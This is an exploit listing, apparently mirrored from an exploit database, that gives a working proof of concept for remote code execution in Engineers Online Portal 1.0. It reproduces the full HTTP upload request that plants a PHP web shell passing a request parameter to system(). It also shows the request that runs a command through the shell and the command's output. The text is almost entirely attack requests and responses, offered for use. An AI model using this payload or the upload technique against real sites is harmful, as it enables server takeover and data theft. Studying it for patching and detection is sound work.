Exploit for Engineers Online Portal 1.0 Shell Upload

Name: Exploit for Engineers Online Portal 1.0 Shell Upload
Rating: 5 (120 reviews)
2021-10-23 | CVSS -0.4
## https://sploitus.com/exploit?id=PACKETSTORM:164608
# Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)  
# Date: 10/23/2021  
# Exploit Author: SadKris  
# Venor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html  
# Version: 1.0  
# Tested on: XAMPP, Windows 11  
  
# ------------------------------------------------------------------------------------------  
# POC  
# ------------------------------------------------------------------------------------------  
  
# Request sent as base user  
  
POST /EngineerShit/teacher_avatar.php HTTP/1.1  
Host: localhost.me  
Content-Length: 510  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost.me  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://localhost.me/EngineerShit/dasboard_teacher.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi  
Connection: close  
  
------WebKitFormBoundarygBJiBS0af0X03GTp  
Content-Disposition: form-data; name="image"; filename="vuln.php"  
Content-Type: application/octet-stream  
  
<HTML><BODY>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<INPUT TYPE="text" NAME="x">  
<INPUT TYPE="submit" VALUE="Send">  
</FORM>  
<pre>  
<?php  
if($_REQUEST['x']) {  
system($_REQUEST['x']);  
} else phpinfo();  
?>  
------WebKitFormBoundarygBJiBS0af0X03GTp  
Content-Disposition: form-data; name="change"  
  
# Response  
  
HTTP/1.1 200 OK  
Date: Sun, 24 Oct 2021 01:51:19 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12  
X-Powered-By: PHP/8.0.12  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 119  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<script>  
window.location = "dasboard_teacher.php";  
</script>  
  
# ------------------------------------------------------------------------------------------  
# Request to webshell  
# ------------------------------------------------------------------------------------------  
  
GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1  
Host: localhost.me  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi  
Connection: close  
  
# ------------------------------------------------------------------------------------------  
# Webshell response  
# ------------------------------------------------------------------------------------------  
  
HTTP/1.1 200 OK  
Date: Sun, 24 Oct 2021 01:54:07 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12  
X-Powered-By: PHP/8.0.12  
Content-Length: 154  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<HTML><BODY>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<INPUT TYPE="text" NAME="x">  
<INPUT TYPE="submit" VALUE="Send">  
</FORM>  
<pre>  
gottem bois